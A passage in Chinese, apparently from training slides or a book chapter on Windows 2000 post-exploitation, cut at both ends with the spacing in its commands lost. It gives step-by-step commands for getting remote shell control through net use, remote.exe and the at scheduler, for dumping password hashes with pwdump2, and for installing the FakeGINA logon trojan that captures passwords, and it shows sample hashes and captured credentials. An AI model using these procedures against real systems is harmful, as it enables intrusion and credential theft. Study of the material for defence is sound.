賬戶的上下文中獲得交互命令行控制GUI控制交互方式一旦攻擊者獲取了對(duì)Windows2000系統(tǒng)的管理訪問(wèn)，幾乎沒有什么方法能夠阻止他將帶來(lái)的損害。很少有攻擊者會(huì)滿足于他所獲得的“管理〞成就并滿意地離開。相反，他總會(huì)進(jìn)一步企圖獲取交互式的控制交互控制是查看系統(tǒng)的內(nèi)部工作狀態(tài)并任意執(zhí)行命令的能力，就像物理上坐在系統(tǒng)前面一樣。在Windows世界中，這可以通過(guò)兩種方式之一來(lái)實(shí)現(xiàn)：通過(guò)命令行界面，例如類似于telnet的連接，或者通過(guò)圖形化的界面，例如PCAnywhere、Microsoft終端效勞器或其他類似的遠(yuǎn)程控制產(chǎn)品當(dāng)然，攻擊者不會(huì)希望使用這種重量級(jí)的技術(shù)，他們需要的是小的、易于隱藏的控制方法命令行控制Remote.exeNetusenetcatRemote.exeremote.exe來(lái)自于WindowsNT/2000ResourceKitremote.exe可以運(yùn)行于效勞器模式或客戶端模式要使用remote.exe獲取目標(biāo)Windows系統(tǒng)的命令行控制，你必須進(jìn)行如下步驟的操作：Remote.exe1. 與目標(biāo)之間創(chuàng)立管理連接：C:\>netuse\\\ipc$password/u:administrator2. 將一個(gè)驅(qū)動(dòng)器映射到管理共享C$：C:\>netuse*\\\c$DriveD:isnowconnectedto\\\c$.Thecommandcompletedsuccessfully.Remote.exe3. 將remote.exe復(fù)制到目標(biāo)上的一個(gè)目錄中：C:\>copyremote.exed:\winnt\system324. 調(diào)用sc命令啟動(dòng)方案任務(wù)效勞：C:\>sc\\startschedule5. 確定遠(yuǎn)程系統(tǒng)上的時(shí)間：C:\>nettime6. 使用at命令啟動(dòng)remote.exe程序，運(yùn)行為效勞器模式:C:\>at\\2:12A摂remote/scmdhackwin“〞Remote.exe7. 檢查是否已經(jīng)通過(guò)at命令啟動(dòng)了remote.exe程序：C:\>StatusID Day Time CommandLine------------------------------------------------------------- 21 Today 2:12AM remote/scmdhackwin8. 以客戶端模式運(yùn)行remote.exe程序，連接到目標(biāo)系統(tǒng)：C:\>remote/chackwin擴(kuò)大影響確定審核密碼提取密碼破解文件搜索GINA木馬嗅探跳板端口重定向確定審核Windows審核可以在事件日志或syslog中記錄下特定的事件，以審查歷史。日志甚至可以用來(lái)觸發(fā)向系統(tǒng)管理員發(fā)出尋呼警告或電子郵件因此，確定審核狀態(tài)通常是幫助理解黑客在系統(tǒng)上所能夠停留時(shí)間的不錯(cuò)的方法auditpolauditpolC:\>Running(X)AuditEnabledSystem =SuccessandFailureLogon =FailureObjectAccess =SuccessandFailurePrivilegeUse =SuccessandFailure密碼提取系統(tǒng)中的密碼存儲(chǔ)有很多種不同的方式我們將討論保存密碼的各種不同的位置，以及用來(lái)獲取這些密碼的方法獲取可逆加密的密碼只有在活動(dòng)目錄域控制器上才可以使用LocalSecuritySetting：StorePasswordswithReversibleEncryption(本地平安設(shè)置：以可逆加密形式存儲(chǔ)密碼)選項(xiàng)。在默認(rèn)情況下，這個(gè)設(shè)置是被禁用的，也就是說(shuō)，密碼不是以可逆的加密形式存儲(chǔ)的——這是有利于平安的但是，如果有人啟用了這個(gè)設(shè)置，那么在此之后新創(chuàng)立的密碼將仍然以普通的SAM/AD散列形式存儲(chǔ)，但是是以一種獨(dú)立的、可逆的加密格式保存的。與單向散列不同，在知道了加密密鑰的情況下，這種格式可以被反向解密為明文的密碼獲取可逆加密的密碼如果攻擊者攻入了域控制器，他們很可能會(huì)立即檢查這個(gè)設(shè)置，如果發(fā)現(xiàn)它被啟用，那么攻擊者將可以利用工具來(lái)獲取整個(gè)域中所有人的明文密碼目前，還沒有哪種公開發(fā)布的工具能夠完成這項(xiàng)工作，但是由于很多API的文檔非常豐富完整，因此編寫這樣的程序應(yīng)該是很簡(jiǎn)單的轉(zhuǎn)存SAM和活動(dòng)目錄密碼從注冊(cè)表中轉(zhuǎn)存密碼是一項(xiàng)簡(jiǎn)單的工作系統(tǒng)的默認(rèn)syskey是平安賬戶管理器(SecurityAccountsManager，SAM)或活動(dòng)目錄(AD)數(shù)據(jù)庫(kù)。這意味著系統(tǒng)中的用戶名和密碼是使用128位加密的，使得破解密碼幾乎是不可能的。但是不要擔(dān)憂，通過(guò)使用由ToddSabin編寫的經(jīng)過(guò)修改的pwdump2工具，仍然有方法可以獲取加密的密碼散列Pwdump2使用了一種稱為動(dòng)態(tài)加載庫(kù)(DynamicallyLoadableLibrary，DLL)注入的技術(shù)。這種技術(shù)可以通過(guò)一個(gè)進(jìn)程強(qiáng)制其他的進(jìn)程裝載附加的DLL，然后在其他進(jìn)程的地址空間和用戶上下文中運(yùn)行這個(gè)DLL中的代碼Pwdump2C:\>copypwdump2.exe\\\c$C:\>copysamdump.dll\\\c$遠(yuǎn)程C:\>pwdump2Administrator:500:e6efe4be4568c7fdaad3b435b51404ee:fd64812d22b9b94638c2a7ff8c49ddc6:::george:1006:315b02fdd7121d6faad3b435b51404ee:d1cd4a77400159a23c47ce7e8808513d:::Guest:501:aad3b435b51404eeaad3b435b51404ee:密碼破解一旦從遠(yuǎn)程系統(tǒng)獲取了加密的密碼或散列，攻擊者通常會(huì)把它們保存在文件中，并對(duì)它們運(yùn)行密碼破解程序以發(fā)現(xiàn)真正的密碼很多人錯(cuò)誤地認(rèn)為密碼破解是解密密碼。事實(shí)并非如此——目前還沒有方法能夠?qū)κ褂肗T/2000算法加密的密碼散列進(jìn)行解密。密碼破解的過(guò)程實(shí)際上是使用相同的算法對(duì)的值進(jìn)行散列運(yùn)算，然后將結(jié)果與使用pwdumpX等工具獲取的散列進(jìn)行比較。如果散列匹配，那么攻擊者就知道了密碼的明文值。因此，密碼破解可以被認(rèn)為是一種高級(jí)的、離線的密碼猜測(cè)方法。密碼破解工具JohntheRipperL0phtcrack3文件搜索findFindstrGrepInvisiable

Keylogger

Stealyh(IKS)擊鍵記錄工具GINA木馬GINA(GraphicalIdentificationandAuthorization，圖形化鑒定和授權(quán))是用戶和Windows認(rèn)證系統(tǒng)之間的中間人當(dāng)你啟動(dòng)你的計(jì)算機(jī)時(shí)，屏幕上要求你按下CTRL+ALT+DEL進(jìn)行登錄的時(shí)候，這正是GINA在工作當(dāng)然，由于GINA本身的保密性質(zhì)，很多黑客很關(guān)注它的破解。特定的程序可以將自己介入到用戶和操作系統(tǒng)之間，從而竊取用戶的密碼GINA木馬－FakeGINA來(lái)自Ntsecurity.nu的ArneVidstrom開發(fā)的FakeGINA是IKS等擊鍵記錄程序的替代品。這個(gè)程序可以介入到Winlogon和GINA之間的通信當(dāng)中去，捕獲在CTRL+ALT+DEL之后輸入的用戶名和密碼然后FakeGINA會(huì)將捕獲的用戶名和密碼寫入到一個(gè)文本文件中去。這個(gè)程序是通過(guò)替換注冊(cè)表中現(xiàn)有的msgina.dll來(lái)到達(dá)這個(gè)目的的FakeGINA的安裝為了遠(yuǎn)程安裝這個(gè)程序，攻擊者需要按照下面的步驟進(jìn)行操作：1. 將fakegina.dll復(fù)制到遠(yuǎn)程驅(qū)動(dòng)器的%SystemRoot%\system32目錄中去。C:\>copyfakegina.dll\\\admin$\system322. 使用ResourceKit工具reg.exe，向Windows注冊(cè)表中參加如下鍵值：Theoperationcompletedsuccessfully.3. 使用ResourceKit工具shutdown重新啟動(dòng)系統(tǒng)：C:\>shutdown\\/R/T:1/Y/CFakeGINA的安裝4. 等待用戶登錄，然后查看文件%SystemRoot%\system32\passlist.txt中的原始登錄用戶名和密碼。假設(shè)攻擊者已經(jīng)將C$共享映射為他的I:驅(qū)動(dòng)器：I:\WINNT\system32>typepasslist.txtFRED-W2KS\Stun0t4u2cFRED-W2KS\Administratorh4pped4ze你可以看到，用戶Stu的密碼為“n0t4u2c〞，Administrator的密碼為“h4pped4ze〞。攻擊者在收集了這個(gè)密碼之后可以繼續(xù)等待其他用戶的登錄，并開始對(duì)網(wǎng)絡(luò)的下一步攻擊。嗅探工具SnifferFsniffDsniffforWin32Ethereal中繼跳板攻擊者獲取了一個(gè)系統(tǒng)的訪問(wèn)權(quán)所導(dǎo)致的最大危險(xiǎn)可能在于他可以利用這個(gè)系統(tǒng)作為跳板，從而進(jìn)一步攻擊其他的系統(tǒng)這種利用一個(gè)侵